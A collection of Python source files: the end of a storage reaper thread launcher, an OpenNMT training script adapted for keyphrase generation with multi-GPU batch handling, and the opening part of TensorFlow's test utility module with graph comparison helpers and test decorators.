:param rses: List of RSEs the reaper should work against. If empty, it considers all RSEs.
:param scheme: Force the reaper to use a particular protocol/scheme, e.g., mock.
:param exclude_rses: RSE expression to exclude RSEs from the Reaper.
:param include_rses: RSE expression to include RSEs.
"""
logging.info('main: starting processes')
if all_rses:
rses = [rse['id'] for rse in rse_core.list_rses()]
else:
rses = [rse_core.get_rse_id(rse=rse) for rse in rses]
threads = []
for worker in range(total_workers):
kwargs = {'worker_number': worker,
'total_workers': total_workers,
'rses': rses,
'once': once,
'chunk_size': chunk_size,
'scheme': scheme}
threads.append(threading.Thread(target=reaper, kwargs=kwargs, name='Worker: %s, Total_Workers: %s' % (worker, total_workers)))
[t.start() for t in threads]
while threads[0].is_alive():
[t.join(timeout=3.14) for t in threads]
|
train.py
|
#!/usr/bin/env python
"""Train models."""
import os
import signal
import torch
import onmt.opts as opts
import onmt.utils.distributed
from onmt.utils.misc import set_random_seed
from onmt.utils.logging import init_logger, logger
from onmt.train_single import main as single_main
from onmt.utils.parse import ArgumentParser
from onmt.inputters.inputter import build_dataset_iter, \
load_old_vocab, old_style_vocab, build_dataset_iter_multiple, make_tgt
from itertools import cycle
from torchtext.data import Field, RawField
def main(opt):
ArgumentParser.validate_train_opts(opt)
ArgumentParser.update_model_opts(opt)
ArgumentParser.validate_model_opts(opt)
# Load checkpoint if we resume from a previous training.
if opt.train_from:
logger.info('Loading checkpoint from %s' % opt.train_from)
checkpoint = torch.load(opt.train_from,
map_location=lambda storage, loc: storage)
logger.info('Loading vocab from checkpoint at %s.' % opt.train_from)
vocab = checkpoint['vocab']
else:
vocab = torch.load(opt.data + '.vocab.pt')
# check for code where vocab is saved instead of fields
# (in the future this will be done in a smarter way)
if old_style_vocab(vocab):
fields = load_old_vocab(
vocab, opt.model_type, dynamic_dict=opt.copy_attn)
else:
fields = vocab
# @memray: a temporary workaround, as well as train_single.py line 78
if opt.model_type == "keyphrase":
if opt.tgt_type in ["one2one", "multiple"]:
del fields['sep_indices']
else:
if 'sep_indices' not in fields:
sep_indices = Field(
use_vocab=False, dtype=torch.long,
postprocessing=make_tgt, sequential=False)
fields["sep_indices"] = sep_indices
if len(opt.data_ids) > 1:
train_shards = []
for train_id in opt.data_ids:
shard_base = "train_" + train_id
train_shards.append(shard_base)
train_iter = build_dataset_iter_multiple(train_shards, fields, opt)
else:
if opt.data_ids[0] is not None:
shard_base = "train_" + opt.data_ids[0]
else:
shard_base = "train"
train_iter = build_dataset_iter(shard_base, fields, opt)
nb_gpu = len(opt.gpu_ranks)
print(os.environ['PATH'])
if opt.world_size > 1:
queues = []
mp = torch.multiprocessing.get_context('spawn')
semaphore = mp.Semaphore(opt.world_size * opt.queue_size)
# Create a thread to listen for errors in the child processes.
error_queue = mp.SimpleQueue()
error_handler = ErrorHandler(error_queue)
# Train with multiprocessing.
procs = []
for device_id in range(nb_gpu):
q = mp.Queue(opt.queue_size)
queues += [q]
procs.append(mp.Process(target=run, args=(
opt, device_id, error_queue, q, semaphore), daemon=True))
procs[device_id].start()
logger.info(" Starting process pid: %d " % procs[device_id].pid)
error_handler.add_child(procs[device_id].pid)
producer = mp.Process(target=batch_producer,
args=(train_iter, queues, semaphore, opt,),
daemon=True)
producer.start()
error_handler.add_child(producer.pid)
for p in procs:
p.join()
producer.terminate()
elif nb_gpu == 1: # case 1 GPU only
single_main(opt, 0)
else: # case only CPU
single_main(opt, -1)
def batch_producer(generator_to_serve, queues, semaphore, opt):
init_logger(opt.log_file)
set_random_seed(opt.seed, False)
# generator_to_serve = iter(generator_to_serve)
def pred(x):
"""
Filters batches that belong only
to gpu_ranks of current node
"""
for rank in opt.gpu_ranks:
if x[0] % opt.world_size == rank:
return True
generator_to_serve = filter(
pred, enumerate(generator_to_serve))
def next_batch(device_id):
new_batch = next(generator_to_serve)
semaphore.acquire()
return new_batch[1]
b = next_batch(0)
for device_id, q in cycle(enumerate(queues)):
b.dataset = None
if isinstance(b.src, tuple):
b.src = tuple([_.to(torch.device(device_id))
for _ in b.src])
else:
b.src = b.src.to(torch.device(device_id))
b.tgt = b.tgt.to(torch.device(device_id))
b.indices = b.indices.to(torch.device(device_id))
b.alignment = b.alignment.to(torch.device(device_id)) \
if hasattr(b, 'alignment') else None
b.src_map = b.src_map.to(torch.device(device_id)) \
if hasattr(b, 'src_map') else None
# hack to dodge unpicklable `dict_keys`
b.fields = list(b.fields)
q.put(b)
b = next_batch(device_id)
def run(opt, device_id, error_queue, batch_queue, semaphore):
""" run process """
try:
gpu_rank = onmt.utils.distributed.multi_init(opt, device_id)
if gpu_rank != opt.gpu_ranks[device_id]:
raise AssertionError("An error occurred in \
Distributed initialization")
single_main(opt, device_id, batch_queue, semaphore)
except KeyboardInterrupt:
pass # killed by parent, do nothing
except Exception:
# propagate exception to parent process, keeping original traceback
import traceback
error_queue.put((opt.gpu_ranks[device_id], traceback.format_exc()))
class ErrorHandler(object):
"""A class that listens for exceptions in children processes and propagates
the tracebacks to the parent process."""
def __init__(self, error_queue):
""" init error handler """
import signal
import threading
self.error_queue = error_queue
self.children_pids = []
self.error_thread = threading.Thread(
target=self.error_listener, daemon=True)
self.error_thread.start()
signal.signal(signal.SIGUSR1, self.signal_handler)
def add_child(self, pid):
""" error handler """
self.children_pids.append(pid)
def error_listener(self):
""" error listener """
(rank, original_trace) = self.error_queue.get()
self.error_queue.put((rank, original_trace))
os.kill(os.getpid(), signal.SIGUSR1)
def signal_handler(self, signalnum, stackframe):
""" signal handler """
for pid in self.children_pids:
os.kill(pid, signal.SIGINT) # kill children processes
(rank, original_trace) = self.error_queue.get()
msg = """\n\n-- Tracebacks above this line can probably
be ignored --\n\n"""
msg += original_trace
raise Exception(msg)
def _get_parser():
parser = ArgumentParser(description='train.py')
opts.config_opts(parser)
opts.model_opts(parser)
opts.train_opts(parser)
return parser
if __name__ == "__main__":
parser = _get_parser()
opt = parser.parse_args()
main(opt)
|
test_util.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from collections import OrderedDict
import contextlib
import gc
import itertools
import math
import random
import re
import tempfile
import threading
import unittest
import numpy as np
import six
_portpicker_import_error = None
try:
import portpicker # pylint: disable=g-import-not-at-top
except ImportError as _error:
_portpicker_import_error = _error
portpicker = None
# pylint: disable=g-import-not-at-top
from google.protobuf import descriptor_pool
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.client import device_lib
from tensorflow.python.client import session
from tensorflow.python.eager import context
from tensorflow.python.eager import tape # pylint: disable=unused-import
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import importer
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
from tensorflow.python.util import nest
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.protobuf import compare
from tensorflow.python.util.tf_export import tf_export
@tf_export("test.gpu_device_name")
def gpu_device_name():
"""Returns the name of a GPU device if available or the empty string."""
for x in device_lib.list_local_devices():
if x.device_type == "GPU" or x.device_type == "SYCL":
return compat.as_str(x.name)
return ""
def assert_ops_in_graph(expected_ops, graph):
"""Assert all expected operations are found.
Args:
expected_ops: `dict<string, string>` of op name to op type.
graph: Graph to check.
Returns:
`dict<string, node>` of node name to node.
Raises:
ValueError: If the expected ops are not present in the graph.
"""
actual_ops = {}
gd = graph.as_graph_def()
for node in gd.node:
if node.name in expected_ops:
if expected_ops[node.name] != node.op:
raise ValueError("Expected op for node %s is different. %s vs %s" %
(node.name, expected_ops[node.name], node.op))
actual_ops[node.name] = node
if set(expected_ops.keys()) != set(actual_ops.keys()):
raise ValueError("Not all expected ops are present. Expected %s, found %s" %
(expected_ops.keys(), actual_ops.keys()))
return actual_ops
@tf_export("test.assert_equal_graph_def")
def assert_equal_graph_def(actual, expected, checkpoint_v2=False):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
checkpoint_v2: boolean determining whether to ignore randomized attribute
values that appear in V2 checkpoints.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
if not isinstance(actual, graph_pb2.GraphDef):
raise TypeError(
"Expected tf.GraphDef for actual, got %s" % type(actual).__name__)
if not isinstance(expected, graph_pb2.GraphDef):
raise TypeError(
"Expected tf.GraphDef for expected, got %s" % type(expected).__name__)
if checkpoint_v2:
_strip_checkpoint_v2_randomized(actual)
_strip_checkpoint_v2_randomized(expected)
diff = pywrap_tensorflow.EqualGraphDefWrapper(actual.SerializeToString(),
expected.SerializeToString())
if diff:
raise AssertionError(compat.as_str(diff))
def assert_meta_graph_protos_equal(tester, a, b):
"""Compares MetaGraphDefs `a` and `b` in unit test class `tester`."""
# Carefully check the collection_defs
tester.assertEqual(set(a.collection_def), set(b.collection_def))
collection_keys = a.collection_def.keys()
for k in collection_keys:
a_value = a.collection_def[k]
b_value = b.collection_def[k]
proto_type = ops.get_collection_proto_type(k)
if proto_type:
a_proto = proto_type()
b_proto = proto_type()
# Number of entries in the collections is the same
tester.assertEqual(
len(a_value.bytes_list.value), len(b_value.bytes_list.value))
for (a_value_item, b_value_item) in zip(a_value.bytes_list.value,
b_value.bytes_list.value):
a_proto.ParseFromString(a_value_item)
b_proto.ParseFromString(b_value_item)
tester.assertProtoEquals(a_proto, b_proto)
else:
tester.assertEquals(a_value, b_value)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("collection_def")
b.ClearField("collection_def")
# Check the graph_defs.
assert_equal_graph_def(a.graph_def, b.graph_def, checkpoint_v2=True)
# Check graph_def versions (ignored by assert_equal_graph_def).
tester.assertProtoEquals(a.graph_def.versions, b.graph_def.versions)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("graph_def")
b.ClearField("graph_def")
tester.assertProtoEquals(a, b)
# Matches attributes named via _SHARDED_SUFFIX in
# tensorflow/python/training/saver.py
_SHARDED_SAVE_OP_PATTERN = "_temp_[0-9a-z]{32}/part"
def _strip_checkpoint_v2_randomized(graph_def):
for node in graph_def.node:
delete_keys = []
for attr_key in node.attr:
attr_tensor_value = node.attr[attr_key].tensor
if attr_tensor_value and len(attr_tensor_value.string_val) == 1:
attr_tensor_string_value = attr_tensor_value.string_val[0]
if (attr_tensor_string_value and
re.match(_SHARDED_SAVE_OP_PATTERN, str(attr_tensor_string_value))):
delete_keys.append(attr_key)
for attr_key in delete_keys:
del node.attr[attr_key]
def IsGoogleCudaEnabled():
return pywrap_tensorflow.IsGoogleCudaEnabled()
def CudaSupportsHalfMatMulAndConv():
return pywrap_tensorflow.CudaSupportsHalfMatMulAndConv()
def IsMklEnabled():
return pywrap_tensorflow.IsMklEnabled()
def InstallStackTraceHandler():
pywrap_tensorflow.InstallStacktraceHandler()
def NHWCToNCHW(input_tensor):
"""Converts the input from the NHWC format to NCHW.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 3, 1, 2], 5: [0, 4, 1, 2, 3]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def NHWCToNCHW_VECT_C(input_shape_or_tensor):
"""Transforms the input from the NHWC layout to NCHW_VECT_C layout.
Note: Does not include quantization or type conversion steps, which should
be applied afterwards.
Args:
input_shape_or_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NCHW_VECT_C
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not evenly
divisible by 4.
"""
permutations = {5: [0, 3, 1, 2, 4], 6: [0, 4, 1, 2, 3, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
temp_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if temp_shape[-1] % 4 != 0:
raise ValueError(
"Last dimension of input must be evenly divisible by 4 to convert to "
"NCHW_VECT_C.")
temp_shape[-1] //= 4
temp_shape.append(4)
permutation = permutations[len(temp_shape)]
if is_tensor:
t = array_ops.reshape(input_shape_or_tensor, temp_shape)
return array_ops.transpose(t, permutation)
else:
return [temp_shape[a] for a in permutation]
def NCHW_VECT_CToNHWC(input_shape_or_tensor):
"""Transforms the input from the NCHW_VECT_C layout to NHWC layout.
Note: Does not include de-quantization or type conversion steps, which should
be applied beforehand.
Args:
input_shape_or_tensor: a 5- or 6-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NHWC
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not 4.
"""
permutations = {5: [0, 2, 3, 1, 4], 6: [0, 2, 3, 4, 1, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
input_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if input_shape[-1] != 4:
raise ValueError("Last dimension of NCHW_VECT_C must be 4.")
permutation = permutations[len(input_shape)]
nhwc_shape = [input_shape[a] for a in permutation[:-1]]
nhwc_shape[-1] *= input_shape[-1]
if is_tensor:
t = array_ops.transpose(input_shape_or_tensor, permutation)
return array_ops.reshape(t, nhwc_shape)
else:
return nhwc_shape
def NCHWToNHWC(input_tensor):
"""Converts the input from the NCHW format to NHWC.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 2, 3, 1], 5: [0, 2, 3, 4, 1]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def skip_if(condition):
"""Skips the decorated function if condition is or evaluates to True.
Args:
condition: Either an expression that can be used in "if not condition"
statement, or a callable whose result should be a boolean.
Returns:
The wrapped function
"""
def real_skip_if(fn):
def wrapper(*args, **kwargs):
if callable(condition):
skip = condition()
else:
skip = condition
if not skip:
fn(*args, **kwargs)
return wrapper
return real_skip_if
def enable_c_shapes(fn):
"""Decorator for enabling C shapes on a test.
Note this enables the C shapes after running the test class's setup/teardown
methods.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
# pylint: disable=protected-access
def wrapper(*args, **kwargs):
prev_value = ops._USE_C_SHAPES
ops._USE_C_SHAPES = True
try:
fn(*args, **kwargs)
finally:
ops._USE_C_SHAPES = prev_value
# pylint: enable=protected-access
return wrapper
def with_c_shapes(cls):
"""Adds methods that call original methods but with C API shapes enabled.
Note this enables C shapes in new methods after running the test class's
setup method.
Args:
cls: class to decorate
Returns:
cls with new test methods added
"""
# If C shapes are already enabled, don't do anything. Some tests break if the
# same test is run twice, so this allows us to turn on the C shapes by default
# without breaking these tests.
if ops._USE_C_SHAPES:
return cls
for name, value in cls.__dict__.copy().items():
if callable(value) and name.startswith("test"):
setattr(cls, name + "WithCShapes", enable_c_shapes(value))
return cls
def enable_cond_v2(fn):
"""Decorator for enabling CondV2 on a test.
Note this enables using CondV2 after running the test class's setup/teardown
methods.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
# pylint: disable=protected-access
def wrapper(*args, **kwargs):
prev_value = control_flow_ops._ENABLE_COND_V2
control_flow_ops._ENABLE_COND_V2 = True
try:
fn(*args, **kwargs)
finally:
control_flow_ops._ENABLE_COND_V2 = prev_value
# pylint: enable=protected-access
return wrapper
def with_cond_v2(cls):
"""Adds methods that call original methods but with CondV2 enabled.
Note this enables CondV2 in new methods after running the test class's
setup method.
Args:
cls: class to decorate
Returns:
cls with new test methods added
"""
if control_flow_ops._ENABLE_COND_V2:
return cls
for name, value in cls.__dict__.copy().items():
if callable(value) and name.startswith("test"):
setattr(cls, name + "WithCondV2", enable_cond_v2(value))
return cls
def assert_no_new_pyobjects_executing_eagerly(f):
"""Decorator for asserting that no new Python objects persist after a test.
Runs the test multiple times executing eagerly, first as a warmup and then
several times to let objects accumulate. The warmup helps ignore caches which
do not grow as the test is run repeatedly.
Useful for checking that there are no missing Py_DECREFs in the C exercised by
a bit of Python.
"""
def decorator(self, **kwargs):
"""Warms up, gets an object count, runs the test, checks for new objects."""
with context.eager_mode():
gc.disable()
f(self, **kwargs)
gc.collect()
previous_count = len(gc.get_objects())
collection_sizes_before = {
collection: len(ops.get_collection(collection))
for collection in ops.get_default_graph().collections
}
for _ in range(3):
f(self, **kwargs)
# Note that gc.get_objects misses anything that isn't subject to garbage
# collection (C types). Collections are a common source of leaks, so we
# test for collection sizes explicitly.
for collection_key in ops.get_default_graph().collections:
collection = ops.get_collection(collection_key)
size_before = collection_sizes_before.get(collection_key, 0)
if len(collection) > size_before:
raise AssertionError(
("Collection %s increased in size from "
"%d to %d (current items %s).") % (collection_key, size_before,
len(collection), collection))
# Make sure our collection checks don't show up as leaked memory by
# removing references to temporary variables.
del collection
del collection_key
del size_before
del collection_sizes_before
gc.collect()
# There should be no new Python objects hanging around.
new_count = len(gc.get_objects())
# In some cases (specifacally on MacOS), new_count is somehow
# smaller than previous_count.
# Using plain assert because not all classes using this decorator
# have assertLessEqual
assert new_count <= previous_count, (
"new_count(%d) is not less than or equal to previous_count(%d)" %
(new_count, previous_count))
gc.enable()
return decorator
def assert_no_new_tensors(f):
"""Decorator for asserting that no new Tensors persist after a test.
Mainly useful for checking that code using the Python C API has correctly
manipulated reference counts.
Clears the caches that it knows about, runs the garbage collector, then checks
that there are no Tensor or Tensor-like objects still around. This includes
Tensors to which something still has a reference (e.g. from missing
Py_DECREFs) and uncollectable cycles (i.e. Python reference cycles where one
of the objects has __del__ defined).
Args:
f: The test case to run.
Returns:
The decorated test case.
"""
def decorator(self, **kwargs):
"""Finds existing Tensors, runs the test, checks for new Tensors."""
def _is_tensorflow_object(obj):
try:
return isinstance(obj,
(ops.Tensor, variables.Variable,
tensor_shape.Dimension, tensor_shape.TensorShape))
except ReferenceError:
# If the object no longer exists, we don't care about it.
return False
tensors_before = set(
id(obj) for obj in gc.get_objects() if _is_tensorflow_object(obj))
outside_executed_eagerly = context.executing_eagerly()
# Run the test in a new graph so that collections get cleared when it's
# done, but inherit the graph key so optimizers behave.
outside_graph_key = ops.get_default_graph()._graph_key
with ops.Graph().as_default():
ops.get_default_graph()._graph_key = outside_graph_key
if outside_executed_eagerly:
with context.eager_mode():
f(self, **kwargs)
else:
f(self, **kwargs)
# Make an effort to clear caches, which would otherwise look like leaked
# Tensors.
context.context()._clear_caches() # pylint: disable=protected-access
gc.collect()
tensors_after = [
obj for obj in gc.get_objects()
if _is_tensorflow_object(obj) and id(obj) not in tensors_before
]
if tensors_after:
raise AssertionError(("%d Tensors not deallocated after test: %s" % (
len(tensors_after),
str(tensors_after),
)))
return decorator
def assert_no_garbage_created(f):
"""Test method decorator to assert that no garbage has been created.
Note that this decorator sets DEBUG_SAVEALL, which in some Python interpreters
cannot be un-set (i.e. will disable garbage collection for any other unit
tests in the same file/shard).
Args:
f: The function to decorate.
Returns:
The decorated function.
"""
def decorator(self, **kwargs):
"""Sets DEBUG_SAVEALL, runs the test, and checks for new garbage."""
gc.disable()
previous_debug_flags = gc.get_debug()
gc.set_debug(gc.DEBUG_SAVEALL)
gc.collect()
previous_garbage = len(gc.garbage)
f(self, **kwargs)
gc.collect()
if len(gc.garbage) > previous_garbage:
logging.error(
"The decorated test created work for Python's garbage collector, "
"likely due to a reference cycle. New objects in cycle(s):")
for i, obj in enumerate(gc.garbage[previous_garbage:]):
try:
logging.error("Object %d of %d", i,
len(gc.garbage) - previous_garbage)
def _safe_object_str(obj):
return "<%s %d>" % (obj.__class__.__name__, id(obj))
logging.error(" Object type: %s", _safe_object_str(obj))
logging.error(
" Referrer types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referrers(obj)]))
logging.error(
" Referent types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referents(obj)]))
logging.error(" Object attribute names: %s", dir(obj))
logging.error(" Object __str__:")
logging.error(obj)
logging.error(" Object __repr__:")
logging.error(repr(obj))
except Exception:
logging.error("(Exception while printing object)")
# This will fail if any garbage has been created, typically because of a
# reference cycle.
self.assertEqual(previous_garbage, len(gc.garbage))
# TODO(allenl): Figure out why this debug flag reset doesn't work. It would
# be nice to be able to decorate arbitrary tests in a large test suite and
# not hold on to every object in other tests.
gc.set_debug(previous_debug_flags)
gc.enable()
return decorator
def _combine_named_parameters(**kwargs):
"""Generate combinations based on its keyword arguments.
Two sets of returned combinations can be concatenated using +. Their product
can be computed using `times()`.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]`
or `option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
if not kwargs:
return [OrderedDict()]
sort_by_key = lambda k: k[0][0]
kwargs = OrderedDict(sorted(kwargs.items(), key=sort_by_key))
first = list(kwargs.items())[0]
rest = dict(list(kwargs.items())[1:])
rest_combined = _combine_named_parameters(**rest)
key = first[0]
values = first[1]
if not isinstance(values, list):
values = [values]
combinations = [
OrderedDict(sorted(list(combined.items()) + [(key, v)], key=sort_by_key))
for v in values
for combined in rest_combined
]
return combinations
def generate_combinations_with_testcase_name(**kwargs):
"""Generate combinations based on its keyword arguments using combine().
This function calls combine() and appends a testcase name to the list of
dictionaries returned. The 'testcase_name' key is a required for named
parameterized tests.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]`
or `option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
combinations = _combine_named_parameters(**kwargs)
named_combinations = []
for combination in combinations:
assert isinstance(combination, OrderedDict)
name = "".join([
"_{}_{}".format("".join(filter(str.isalnum, key)), "".join(
filter(str.isalnum, str(value))))
for key, value in combination.items()
])
named_combinations.append(
OrderedDict(
list(combination.items()) + [("testcase_name",
"_test{}".format(name))]))
return named_combinations
def run_all_in_graph_and_eager_modes(cls):
"""Execute all test methods in the given class with and without eager."""
base_decorator = run_in_graph_and_eager_modes
for name, value in cls.__dict__.copy().items():
if callable(value) and name.startswith("test"):
setattr(cls, name, base_decorator(value))
return cls
def run_in_graph_and_eager_modes(func=None,
config=None,
use_gpu=True,
reset_test=True,
assert_no_eager_garbage=False):
"""Execute the decorated test with and without enabling eager execution.
This function returns a decorator intended to be applied to test methods in
a `tf.test.TestCase` class. Doing so will cause the contents of the test
method to be executed twice - once normally, and once with eager execution
enabled. This allows unittests to confirm the equivalence between eager
and graph execution (see `tf.enable_eager_execution`).
For example, consider the following unittest:
```python
class MyTests(tf.test.TestCase):
@run_in_graph_and_eager_modes
def test_foo(self):
x = tf.constant([1, 2])
y = tf.constant([3, 4])
z = tf.add(x, y)
self.assertAllEqual([4, 6], self.evaluate(z))
if __name__ == "__main__":
tf.test.main()
```
This test validates that `tf.add()` has the same behavior when computed with
eager execution enabled as it does when constructing a TensorFlow graph and
executing the `z` tensor in a session.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
config: An optional config_pb2.ConfigProto to use to configure the
session when executing graphs.
use_gpu: If True, attempt to run as many operations as possible on GPU.
reset_test: If True, tearDown and SetUp the test case between the two
executions of the test (once with and once without eager execution).
assert_no_eager_garbage: If True, sets DEBUG_SAVEALL on the garbage
collector and asserts that no extra garbage has been created when running
the test with eager execution enabled. This will fail if there are
reference cycles (e.g. a = []; a.append(a)). Off by default because some
tests may create garbage for legitimate reasons (e.g. they define a class
which inherits from `object`), and because DEBUG_SAVEALL is sticky in some
Python interpreters (meaning that tests which rely on objects being
collected elsewhere in the unit test file will not work). Additionally,
checks that nothing still has a reference to Tensors that the test
allocated.
Returns:
Returns a decorator that will run the decorated test method twice:
once by constructing and executing a graph in a session and once with
eager execution enabled.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError(
"`run_test_in_graph_and_eager_modes` only supports test methods. "
"Did you mean to use `run_all_tests_in_graph_and_eager_modes`?")
def decorated(self, **kwargs):
try:
with context.graph_mode():
with self.test_session(use_gpu=use_gpu, config=config):
f(self, **kwargs)
except unittest.case.SkipTest:
pass
def run_eagerly(self, **kwargs):
if not use_gpu:
with ops.device("/cpu:0"):
f(self, **kwargs)
else:
f(self, **kwargs)
if assert_no_eager_garbage:
ops.reset_default_graph()
run_eagerly = assert_no_new_tensors(
assert_no_garbage_created(run_eagerly))
if reset_test:
# This decorator runs the wrapped test twice.
# Reset the test environment between runs.
self.tearDown()
self._tempdir = None
# Create a new graph for the eagerly executed version of this test for
# better isolation.
graph_for_eager_test = ops.Graph()
with graph_for_eager_test.as_default(), context.eager_mode():
if reset_test:
self.setUp()
run_eagerly(self, **kwargs)
ops.dismantle_graph(graph_for_eager_test)
return decorated
if func is not None:
return decorator(func)
return decorator
@tf_export("test.is_gpu_available")
def is_gpu_available(cuda_only=False, min_cuda_compute_capability=None):
"""Returns whether TensorFlow can access a GPU.
Args:
cuda_only: limit the search to CUDA gpus.
min_cuda_compute_capability: a (major,minor) pair that indicates the minimum
CUDA compute capability required, or None if no requirement.
Returns:
True iff a gpu device of the requested kind is available.
"""
def compute_capability_from_device_desc(device_desc):
# TODO(jingyue): The device description generator has to be in sync with
# this file. Another option is to put compute capability in
# DeviceAttributes, but I avoided that to keep DeviceAttributes
# target-independent. Reconsider this option when we have more things like
# this to keep in sync.
# LINT.IfChange
match = re.search(r"compute capability: (\d+)\.(\d+)", device_desc)
# LINT.ThenChange(//tensorflow/core/\
# common_runtime/gpu/gpu_device.cc)
if not match:
return 0, 0
return int(match.group(1)), int(match.group(2))
try:
for local_device in device_lib.list_local_devices():
if local_device.device_type == "GPU":
if (min_cuda_compute_capability is None or
compute_capability_from_device_desc(
local_device.physical_device_desc) >=
min_cuda_compute_capability):
return True
if local_device.device_type == "SYCL" and not cuda_only:
return True
return False
except errors_impl.NotFoundError as e:
if not all([x in str(e) for x in ["CUDA", "not find"]]):
raise e
else:
logging.error(str(e))
return False
@contextlib.contextmanager
def device(use_gpu):
"""Uses gpu when requested and available."""
if use_gpu and is_gpu_available():
dev = "/device:GPU:0"
else:
dev = "/device:CPU:0"
with ops.device(dev):
yield
class ErrorLoggingSession(session.Session):
"""Wrapper around a Session that logs errors in run().
"""
def run(self, *args, **kwargs):
try:
return super(ErrorLoggingSession, self).run(*args, **kwargs)
except Exception as e: # pylint: disable=broad-except
logging.error(str(e))
raise
@tf_export("test.TestCase")
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow.
"""
def __init__(self, methodName="runTest"): # pylint: disable=invalid-name
super(TensorFlowTestCase, self).__init__(methodName)
self._threads = []
self._tempdir = None
self._cached_session = None
def setUp(self):
self._ClearCachedSession()
random.seed(random_seed.DEFAULT_GRAPH_SEED)
np.random.seed(random_seed.DEFAULT_GRAPH_SEED)
# Note: The following line is necessary because some test methods may error
# out from within nested graph contexts (e.g., via assertRaises and
# assertRaisesRegexp), which may leave ops._default_graph_stack non-empty
# under certain versions of Python. That would cause
# ops.reset_default_graph() to throw an exception if the stack were not
# cleared first.
ops._default_graph_stack.reset() # pylint: disable=protected-access
ops.reset_default_graph()
random_seed.set_random_seed(random_seed.DEFAULT_GRAPH_SEED)
def tearDown(self):
for thread in self._threads:
thread.check_termination()
self._ClearCachedSession()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
"""Returns a unique temporary directory for the test to use.
If you call this method multiple times during in a test, it will return the
same folder. However, across different runs the directories will be
different. This will ensure that across different runs tests will not be
able to pollute each others environment.
If you need multiple unique directories within a single test, you should
use tempfile.mkdtemp as follows:
tempfile.mkdtemp(dir=self.get_temp_dir()):
Returns:
string, the path to the unique temporary directory created for this test.
"""
if not self._tempdir:
self._tempdir = tempfile.mkdtemp(dir=googletest.GetTempDir())
return self._tempdir
def _AssertProtoEquals(self, a, b, msg=None):
"""Asserts that a and b are the same proto.
Uses ProtoEq() first, as it returns correct results
for floating point attributes, and then use assertProtoEqual()
in case of failure as it provides good error messages.
Args:
a: a proto.
b: another proto.
msg: Optional message to report on failure.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True, msg=msg)
def assertProtoEquals(self, expected_message_maybe_ascii, message, msg=None):
"""Asserts that message is same as parsed expected_message_ascii.
Creates another prototype of message, reads the ascii message into it and
then compares them using self._AssertProtoEqual().
Args:
expected_message_maybe_ascii: proto message in original or ascii form.
message: the message to validate.
msg: Optional message to report on failure.
"""
